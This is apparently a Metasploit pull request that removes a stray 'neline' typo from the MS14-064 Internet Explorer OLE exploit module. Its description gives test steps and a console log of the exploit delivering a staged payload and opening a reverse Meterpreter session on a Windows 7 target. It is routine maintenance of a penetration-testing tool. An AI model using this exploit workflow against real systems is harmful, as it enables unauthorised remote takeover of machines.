### PR TITLE
Fix #4284 - Typo "neline" causing the exploit to break

### DIFF
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -100,7 +100,6 @@ dim   myarray
 
 Begin()
 
-neline
 function Begin()
   On Error Resume Next
   info=Navigator.UserAgent


### PR DESCRIPTION
"neline" isn't supposed to be there at all.

Fix #4284.

To verify:
- [ ] Get a Windows 7 box (IE8 or IE9 or IE 10). Win 7 already has powershell by default.
- [ ] With the patch, run ms14_064_ole_code_execution
- [ ] You should get an output like this:

```
msf exploit(ms14_064_ole_code_execution) > rerun
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/BPM8Wcqse8vd
[*]  Local IP: http://192.168.1.64:8080/BPM8Wcqse8vd
[*] Server started.
[*] 192.168.1.134    ms14_064_ole_code_execution - Gathering target information.
[*] 192.168.1.134    ms14_064_ole_code_execution - Sending response HTML.
[*] 192.168.1.134    ms14_064_ole_code_execution - Requesting: /BPM8Wcqse8vd/CyUrFD/
[*] Sending stage (770048 bytes) to 192.168.1.134
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.134:49439) at 2014-12-01 01:24:26 -0600
```

When you land this, please use the keyword "Fix" for issue 4284, because I forgot to do this in my commit. Hopefully by doing that it will automatically close the ticket.
